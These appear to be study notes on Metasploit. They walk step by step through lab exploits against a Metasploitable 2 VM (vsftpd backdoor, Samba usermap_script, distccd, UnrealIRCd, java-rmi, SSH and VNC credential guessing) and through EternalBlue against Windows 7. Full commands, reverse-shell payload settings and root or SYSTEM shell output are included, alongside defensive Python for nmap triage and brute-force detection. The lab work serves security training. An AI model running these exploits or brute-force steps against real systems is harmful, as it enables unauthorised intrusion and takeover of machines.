- path to the Metasploit Framework: cd /usr/share/metasploit-framework/
The 7 module types the Metasploit Framework contains:
- exploits (buffer overflow, code injection, web application)
- auxiliary (does not execute a payload as an exploit module does; instead it is used to perform other actions such as information gathering, fingerprinting, scanning, fuzzing or denial of service)
- post (post-exploitation, as the name says: used after exploiting the target to gather or steal information from the target device: files, saved passwords, dumping hashes, enumerating services and applications on the target)
- payloads (delivered to the target together with an exploit in order to control the machine: singles are payloads that are completely stand-alone | stagers set up a network connection between the attacker and the victim; they are small and reliable (bind or reverse; almost all the time we will use reverse TCP) | stages are payload components downloaded by stager modules; they can provide advanced features with no size limit, for example meterpreter shells (malware, trojan or virus) that can download files, upload files, record the microphone, run the webcam, take screenshots, etc.)
- encoders (help evade antivirus detection)
- evasion (similar to encoders, mainly designed to evade Windows Defender)
- nops (a no-operation is an instruction telling the processor to do nothing; useful in buffer overflows to fill a lot of space in memory before the payload executes)
msfconsole and msfvenom
To run the Metasploit Framework simply run msfconsole in the terminal
- use the show payloads command to list all the payloads
- to select a certain module use the command use followed by the name of the module, example: msf6 > use payload/windows/x64/shell/bind_tcp_rc4
- use show info to get more details about what the selected module can do
- use show options to understand what the module needs to function
- use set <parameter name> <value> (for example LHOST) to change a default such as the already configured IP address
- running show payloads again will now not list all the payloads but only the ones compatible with the currently selected exploit
- use set payload <payload name> to replace the default payload with the one you have chosen
- use show targets to get the full list of targets that we can exploit using this attack
- use set target 3 to select the 3rd option listed by the command above
- use exploit to run the exploit
Example 1 – vsftpd 2.3.4
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the FTP port: 21/tcp open ftp vsftpd 2.3.4
- the goal is to find an exploit if this software is vulnerable
- as an initial action, before googling for possible exploits, you can search the Metasploit Framework itself
- on terminal2: run $ searchsploit vsftpd 2.3.4
- on terminal3: run msfconsole and then type: msf6 > search vsftpd
- msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.222.127
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.222.127:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.222.127:21 – USER: 331 Please specify the password.
[+] 192.168.222.127:21 – Backdoor service has been spawned, handling…
[+] 192.168.222.127:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.222.127:6200) at 2021-08-18 17:39:36 -0400
whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:e1:70:b1
inet addr:192.168.222.127 Bcast:192.168.222.2 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fee1:70b1/64 Scope:Link
- to exit the shell just type: exit
exit
[*] 192.168.222.127 – Command shell session 1 closed.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
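Every example in these notes starts from the same nmap -sV step. As an added example (my own code, not part of the notes or of Metasploit), here is a small Python parser for that port table plus a triage pass that flags the services the notes go on to examine; the sample scan is constructed from the findings quoted across the notes, and the triage rules and their labels are my own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nmap -sV` output, assembled from the port lines quoted
# in these notes (not a real scan capture).
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5900/tcp open  vnc         VNC (protocol 3.3)
6667/tcp open  irc         UnrealIRCd
8787/tcp open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
"""

# port/proto, state, service name, then everything else is the version banner
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str

def parse_nmap_sv(text):
    """Parse the port table of `nmap -sV` normal output into Service records."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header, blank or other non-port lines
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, version.strip()))
    return services

# Triage rules (my own): service name, regex on the version banner, label.
# Version regexes are exact so an unaffected build is not flagged.
RULES = [
    ("ftp", r"^vsftpd 2\.3\.4\b", "vsftpd 2.3.4 backdoored build (vsftpd_234_backdoor)"),
    ("telnet", r".*", "clear-text telnet login exposed"),
    ("bindshell", r".*", "unauthenticated root shell listening"),
    ("distccd", r".*", "distccd exposed to the network (distcc_exec)"),
    ("irc", r"^UnrealIRCd\b", "UnrealIRCd: confirm it is not the 3.2.8.1 backdoored build"),
    ("netbios-ssn", r"^Samba smbd 3\.X", "Samba 3.x: fingerprint the exact version (smb_version)"),
    ("vnc", r".*", "VNC exposed: verify the password is not a default"),
]

def triage(services):
    """Return [(port, label)] for every open service matching a triage rule."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        for name, pattern, label in RULES:
            if s.name == name and re.match(pattern, s.version):
                findings.append((s.port, label))
                break
    return findings
```

Feeding real `nmap -sV` output through `parse_nmap_sv` works the same way; only the port-table lines are consumed.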
Example 2 – Misconfiguration bindshell
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 1524/tcp open bindshell Metasploitable root shell
- on terminal2 let's use a tool called netcat (a program used to establish network connections with other machines using both TCP and UDP)
- to check the help menu run: (mrhacker㉿kali)-[~/Desktop] nc -h
[v1.10-46]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
- to use it run:
┌──(mrhacker㉿kali)-[~/Desktop]
└─$ nc 192.168.222.127 1524
root@metasploitable:/#
Example 3 – telnet
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 23/tcp open telnet Linux telnetd
- on terminal2: run $ searchsploit Linux telnetd | no really helpful results found
- let's try the default username and password: telnet 192.168.222.127
┌──(mrhacker㉿kali)-[~]
└─$ telnet 192.168.222.127
Trying 192.168.222.127…
Connected to 192.168.222.127.
Escape character is '^]'.
(metasploitable2 ASCII-art banner)
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Wed Aug 18 17:19:18 EDT 2021 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ sudo su
[sudo] password for msfadmin:
root@metasploitable:/home/msfadmin# whoami
root
root@metasploitable:/home/msfadmin#
Example 4 – Samba
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- and this one: 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- on terminal2: run $ searchsploit Samba | too many results, we need to narrow it down
- on terminal3: run $ msfconsole | and then run: msf6 > search samba | some results, but not the ones that we are looking for
- let’s then try: msf6 > use auxiliary/scanner/smb/ and try this module: 12 auxiliary/scanner/smb/smb_version
- msf6 auxiliary(scanner/smb/smb_version) > show info
- msf6 auxiliary(scanner/smb/smb_version) > show options
- msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.222.127
- msf6 auxiliary(scanner/smb/smb_version) > exploit
- valuable output identified: [*] 192.168.222.127:445 – Host could not be identified: Unix (Samba 3.0.20-Debian)
- on terminal2: run $ searchsploit Samba 3.0.20 | excluding all the .txt and .py files we are left with only one valid option: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) - unix/remote/16320.rb
- on terminal3: run msf6 > search samba | now we know that we are interested in: 8 exploit/multi/samba/usermap_script
- msf6 > use exploit/multi/samba/usermap_script
- msf6 exploit(multi/samba/usermap_script) > show info
- msf6 exploit(multi/samba/usermap_script) > show options
- msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.222.59:4444
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:34804) at 2021-08-19 05:29:39 -0400
whoami
root
Example 5 – Brute-force SSH Attack
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose this one again: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
- on terminal2: msf6 > search ssh | out of the long list let’s select this one: 45 auxiliary/scanner/ssh/ssh_login
- msf6 > use auxiliary/scanner/ssh/ssh_login
- on terminal3: /home/mrhacker/Desktop/ nano usernames.txt | type inside a few possible usernames, including the correct one: admin, root, toor, user123, msfadmin, admin123 | one per line
- on terminal3: /home/mrhacker/Desktop/ nano passwords.txt | type inside a few possible passwords, including the correct one: password, password123, helloworld, msfadmin, test1234 | one per line
- on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/mrhacker/Desktop/passwords.txt
PASS_FILE => /home/mrhacker/Desktop/passwords.txt
- on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/mrhacker/Desktop/usernames.txt
USER_FILE => /home/mrhacker/Desktop/usernames.txt
- on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
- on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
- msf6 auxiliary(scanner/ssh/ssh_login) > exploit
[+] 192.168.222.127:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.222.59:33103 -> 192.168.222.127:22) at 2021-08-19 06:29:09 -0400
[-] 192.168.222.127:22 - Failed: 'admin123:password'
- msf6 auxiliary(scanner/ssh/ssh_login) > sessions
- msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
whoami
msfadmin
sudo su
[sudo] password for msfadmin: msfadmin
whoami
root
- as we now have the username and password we could also ssh into the machine directly using the discovered credentials: msfadmin/msfadmin
┌──(mrhacker㉿kali)-[~]
└─$ ssh msfadmin@192.168.222.127
msfadmin@192.168.222.127's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
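The same ssh_login run seen from the target's side, as an added example (my own code, not part of these notes or of Metasploit): the auth.log excerpt is constructed to mirror the attempts above, and the rule of 5 failed passwords from one source within 60 seconds, followed by an accepted login from that source, is my own assumption about a sensible threshold.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt modelled on the ssh_login run in these notes:
# one source tries the username/password lists, then one pair succeeds.
SAMPLE_AUTH_LOG = """\
Aug 19 06:29:01 metasploitable sshd[4101]: Failed password for invalid user admin from 192.168.222.59 port 33090 ssh2
Aug 19 06:29:02 metasploitable sshd[4103]: Failed password for root from 192.168.222.59 port 33092 ssh2
Aug 19 06:29:03 metasploitable sshd[4105]: Failed password for invalid user toor from 192.168.222.59 port 33094 ssh2
Aug 19 06:29:04 metasploitable sshd[4107]: Failed password for invalid user user123 from 192.168.222.59 port 33096 ssh2
Aug 19 06:29:06 metasploitable sshd[4109]: Failed password for msfadmin from 192.168.222.59 port 33100 ssh2
Aug 19 06:29:09 metasploitable sshd[4111]: Accepted password for msfadmin from 192.168.222.59 port 33103 ssh2
Aug 19 06:29:10 metasploitable sshd[4113]: Failed password for invalid user admin123 from 192.168.222.59 port 33105 ssh2
Aug 19 06:35:00 metasploitable sshd[4200]: Accepted password for msfadmin from 192.168.222.10 port 50222 ssh2
"""

# syslog timestamp, host, sshd[pid], outcome, optional "invalid user", user, source
LOG_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def parse_sshd(text, year=2021):
    """Return [(timestamp, outcome, user, src_ip)] for sshd password events.
    syslog lines carry no year, so it is supplied by the caller."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a password event
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events

def detect_bruteforce(events, threshold=5, window_s=60):
    """Alert once when a source reaches `threshold` failures inside `window_s`,
    and again on any Accepted login from a source still over that threshold."""
    fails = defaultdict(list)  # src_ip -> timestamps of failures in the window
    alerts = []
    for ts, outcome, user, src in sorted(events):
        recent = [t for t in fails[src] if (ts - t).total_seconds() <= window_s]
        if outcome == "Failed":
            recent.append(ts)
            if len(recent) == threshold:  # fire once as the threshold is crossed
                alerts.append(("BRUTE_FORCE", src, ts))
        elif len(recent) >= threshold:
            alerts.append(("SUCCESS_AFTER_BRUTE_FORCE", src, ts, user))
        fails[src] = recent
    return alerts
```

The second alert is the one worth paging on: a successful login from a source that has just been guessing is the signature of a credential-stuffing hit such as msfadmin/msfadmin above.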
Example 6 – distccd
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one: 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
- on terminal2: msfconsole and then run: msf6 > search distc | only one record found: exploit/unix/misc/distcc_exec
- msf6 > use exploit/unix/misc/distcc_exec
- msf6 exploit(unix/misc/distcc_exec) > show options
- msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.222.127 (remote host)
- msf6 exploit(unix/misc/distcc_exec) > show payloads
- msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
- msf6 exploit(unix/misc/distcc_exec) > set LHOST 192.168.222.59 (listening host)
LHOST => 192.168.222.59
- msf6 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 9JUz23ZkTBY4MuQx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “9JUz23ZkTBY4MuQx\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:50819) at 2021-08-19 10:37:49 -0400
whoami
daemon
hostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Example 7 – UnrealIRCd
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try these ones: 6667/tcp open irc UnrealIRCd | 6697/tcp open irc UnrealIRCd
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit irc | too many findings
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit UnrealIRCd | just 4 findings, and only one Ruby: UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) linux/remote/16922.rb
- on terminal3: msfconsole and then run: msf6 > search UnrealIRCd
- msf6 > use 0
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show info
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.222.59 netmask 255.255.255.0 broadcast 192.168.222.255
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.222.59
LHOST => 192.168.222.59
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] 192.168.222.127:6667 – Connected to 192.168.222.127:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
[*] 192.168.222.127:6667 – Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo FtAIdHWFZQ9qDwWD;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “FtAIdHWFZQ9qDwWD\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:44450) at 2021-08-19 10:52:15 -0400
whoami
root
hostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Example 8 – drb
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit drb | too many findings
- on terminal3: msfconsole and then run: msf6 > search drb
- msf6 > use exploit/linux/misc/drb_remote_codeexec
- (this ruby file was removed from kali-linux-2021.2 | still available in kali-linux-2020.2)
Example 9 – vnc
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 5900/tcp open vnc VNC (protocol 3.3)
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit vnc | too many findings
- on terminal3: msfconsole and then run: msf6 > search vnc
- this one looks interesting: exploit/multi/vnc/vnc_keyboard_exec | but its payload is for Windows, so it will not work here
- let’s try to connect to VNC on the target machine:
- (mrhacker㉿kali)-[~/Desktop] $ vncviewer 192.168.222.127
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: password | the password was password
Authentication successful
Example 10 – java-rmi
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 1099/tcp open java-rmi GNU Classpath grmiregistry
- on terminal2: msfconsole and then run: msf6 > search java rmi
- msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
- msf6 exploit(multi/misc/java_rmi_server) > show options
- msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.222.127
- msf6 exploit(multi/misc/java_rmi_server) > run
- msf6 exploit(multi/misc/java_rmi_server) > show sessions
- msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
- meterpreter > help
- meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
Example 11 – Windows 7 x64 – EternalBlue, an NSA-developed exploit
- check the IP address of the Windows 7 x64 virtual machine with ipconfig: 192.168.222.205
- on terminal1: run sudo nmap -sS 192.168.222.205
- let’s try these ones: 139/tcp open netbios-ssn and 445/tcp open microsoft-ds
- on terminal2: msfconsole and then run msf6 > search eternalblue
- let’s use this one to test if the target is vulnerable: “auxiliary/scanner/smb/smb_ms17_010”
- msf6 > use 4
- msf6 auxiliary(scanner/smb/smb_ms17_010) > show info
- msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
- msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.222.205
RHOSTS => 192.168.222.205
msf6 auxiliary(scanner/smb/smb_ms17_010) >
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
- on terminal2: in msfconsole run msf6 > search eternalblue again
- now that we know the target is vulnerable, let's use the exploit module itself: "exploit/windows/smb/ms17_010_eternalblue"
- msf6 > use 0
- msf6 exploit(windows/smb/ms17_010_eternalblue) > show info
- msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
- msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.222.205
RHOSTS => 192.168.222.205
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.222.59:4444
[*] 192.168.222.205:445 – Executing automatic check (disable AutoCheck to override)
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[+] 192.168.222.205:445 – The target is vulnerable.
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] 192.168.222.205:445 – Connecting to target for exploitation.
[+] 192.168.222.205:445 – Connection established for exploitation.
[+] 192.168.222.205:445 – Target OS selected valid for OS indicated by SMB reply
[*] 192.168.222.205:445 – CORE raw buffer dump (38 bytes)
[*] 192.168.222.205:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.222.205:445 – 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.222.205:445 – 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.222.205:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.222.205:445 – Trying exploit with 12 Groom Allocations.
[*] 192.168.222.205:445 – Sending all but last fragment of exploit packet
[*] 192.168.222.205:445 – Starting non-paged pool grooming
[+] 192.168.222.205:445 – Sending SMBv2 buffers
[+] 192.168.222.205:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.222.205:445 – Sending final SMBv2 buffers.
[*] 192.168.222.205:445 – Sending last fragment of exploit packet!
[*] 192.168.222.205:445 – Receiving response from exploit packet
[+] 192.168.222.205:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.222.205:445 – Sending egg to corrupted connection.
[*] 192.168.222.205:445 – Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.222.205
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.222.59:4444 -> 192.168.222.205:49166) at 2021-08-19 12:33:18 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > help
meterpreter > screenshot
Screenshot saved to: /home/mrhacker/Desktop/OvtUHTeu.jpeg
meterpreter >